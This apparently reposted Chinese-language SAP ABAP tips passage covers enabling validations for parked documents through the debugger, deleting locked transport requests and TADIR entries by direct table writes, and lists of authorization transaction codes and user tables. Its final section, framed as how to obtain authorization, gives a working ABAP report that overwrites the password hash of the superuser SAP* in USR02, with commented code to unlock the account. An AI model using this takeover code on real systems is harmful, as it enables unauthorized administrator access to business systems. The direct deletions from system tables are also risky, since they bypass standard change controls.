5. 预制凭证可使用退代吗 ?
这个问题就好比去问一个人是否有双眉毛一样?答案是一般天生是没有,如去整容院整就能有. SAP标准程序是不允许预制凭证有退代的,其实也没必要,因为预制凭证本来就不是正式凭证,比如posting date就算现在根据某种规则退代了,等真正posting时还不是要根据正常凭证的规则去post ,这不多此一举.
如果真需为预制设置退代,也很容易.请看下面分解.
(1)使用/H启动debug,按F6直到执行到SAPMF05A screen Number 1001,在module document_merge设置断点,这个module是判断是否有退代的入口.
(2)parked doc g_status =2 .
如下图加入代码,则退代对FV50预制凭证生效.
FI_VALIDATION_DOC
FI_VALIDATION_HEADER
FI_VALIDATION_ITEM
6. 物料凭证可使用退代和确定吗?
如果Mat doc产生的同时产生了财务凭证当然可以使用.
1.
2.
8.
关于传输请求在第二章13节已经有详细说明,下面是一个关于如何删除被锁的传输请求的程序,读者可根据实际情况补充.
通常对锁住的表对象可采用SM12解锁,对传输请求可按下面程序处理.
Program ZSTDELREQ .
data :
itab_e070 like e070 occurs 0 with header line,
* Request header including Req user.
iwa_e070c like e070c, "Request client
itab_e071 like e071 occurs 0 with header line ,
*Request entry line items may include multiple lines
iwa_e07t like e07t , "Requst short text(desc)
iwa_E070A like E070A ,
*If the Request was locked and delelted,Delete Tlock otherwise
*The program will be locked to make any modifications.
itab_tlock like tlock occurs 0 with header line .
parameter reqno like e070-trkorr default '' .
select * into table itab_e070 from e070
where trkorr eq reqno or strkorr eq reqno.
if SY-SUBRC Ne 0 .
write : 'The Request No.:' , Reqno , ' not exist !' .
* exit .
endif .
select single * into iwa_e070c from e070c
where trkorr eq reqno .
select * into table itab_e071 from e071
where trkorr eq reqno .
select single * into iwa_e07t from e07t
where trkorr eq reqno .
select single * into iwa_E070A from e070A
where trkorr eq reqno .
if itab_e070 IS INITIAL .
select * into table itab_tlock from tlock
where trkorr eq reqno .
else.
select * into table itab_tlock from tlock
FOR ALL ENTRIES IN itab_e070
where TRKORR eq itab_e070-trkorr .
endif.
if SY-SUBRC NE 0 .
write : / 'No Locked object for the request NO. was found!'.
endif .
delete :
e070 from table itab_e070 ,
e070c from iwa_e070c,
e071 from table itab_e071,
e07t from iwa_e07t ,
e070A from iwa_E070A ,
tlock from table itab_tlock .
write : / 'The Request No.:' , Reqno ,
' has already been successfully Full deleted'.
如果开发的程序被包含在$TMP package中,现在想传输到QAS或PRD,需要改换package,一个简单的方法就是将记录从资源库对象目录TADIR表中将记录删除(程序如下),接下来改变保存激活程序就会重新弹出Create Object Directory Entry的窗口.
Report zdelpackage.
data iwa_tadir like tadir .
select single * into iwa_tadir from tadir
where OBJ_NAME = 'ZXMBCU02'."change to your prog. Name.
delete tadir from iwa_tadir.
尽管SAP系统提供了非常完善的权限控制机制,甚至允许细到字段级和允许用户自定义授权对象,然后SAP权限控制漏洞也是致命的,随便一个小程序就可轻易获取权限
作为职业程序员,对取得权限大多会有一定兴趣(这点催生了一批无聊的所谓Hacker).
读者可自行理解下面几个概,在此不再细述.
[1].Activity(group)
[2].Authorization Object
[3].Profile
[4].Role
实际上决定权限的是Authorization Object , 看USR_USER_AUTH_FOR_OBJ_GET
和AUTHORIZATION_DATA_READ_SELOBJ函数就知道了.
常用权限相关Tcode .
(一)Role(角色)相关T-code:
PFAC 标准
PFAC_CHG 改变
PFAC_DEL 删除
PFAC_DIS 显示
PFAC_INS 新建
PFAC_STR
PFCG 创建
ROLE_CMP 比较
SUPC 批量建立角色profile
SWUJ 测试
SU03 检测授权
SU25, SU26 检查Profile
(二)建立用户
SU0
SU01
SU01D
SU01_NAV
SU05
SU1
SU10 批量
SU12 批量
SUCOMP:维护用户公司地址
SU2 change用户参数
SUIM 用户信息系统,可by 多个查询.
(三)建立用户组
SUGR:维护
SUGRD:显示
SUGRD_NAV:还是维护
SUGR_NAV:还是显示
(四)维护检查授权
SU20|SU21:如有特殊需要定义自己的authorization fields
SU50|SU51|SU52
SU53:当有权限问题可使用它检测
SU56:分析authoraztion data buffers. SU87:用来检查用户改变产生的history SU96,SU97,SU98,SU99:
常用权限相关表格:
TOBJ : All avaiable authorzation objects.(SAP default objects全在此)
USR12: 用户级authoraztion值
USR02:密码table
USR04:Authorization
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:当前用户(SM04看到的所有当前活动用户)
USRBF2:记录当前用户所有的授权objects
UST04:User Profile master
UST10C: Composite profiles
UST10S: Single profiles
UST12 : Authorizations
如何获取权限呢?下面举几个实际例子
修改某权限大的用户密码.下面是直接修改SAP*的密码为123.就一句话足矣.
report ZMODPWD.
tables :usr02 .
*Data ZUSR02 like USR02 .
*select single * into zUSR02 from USR02
*where BNAME = 'SAP*'.
*ZUSR02-BNAME = 'SAP*'.
*ZUSR02-Bcode = '9C8AB8600E74D864' .
*ZUSR02-UFLAG = '0' ."unlock SAP*
*Update USR02 from ZUSR02 .
update usr02 set bcode = 'DF52478E6FF90EEB'
where BNAME = 'SAP*'.
就是说通过上面的程序轻易将sap*的密码给修改了.加密算法在此彻底失效
转载于:https://www.cnblogs.com/vibratea/archive/2009/07/27/1531750.html
相关资源:ABAP(Advanced Business Application Programming->高级业务应用编程语言)入门到精通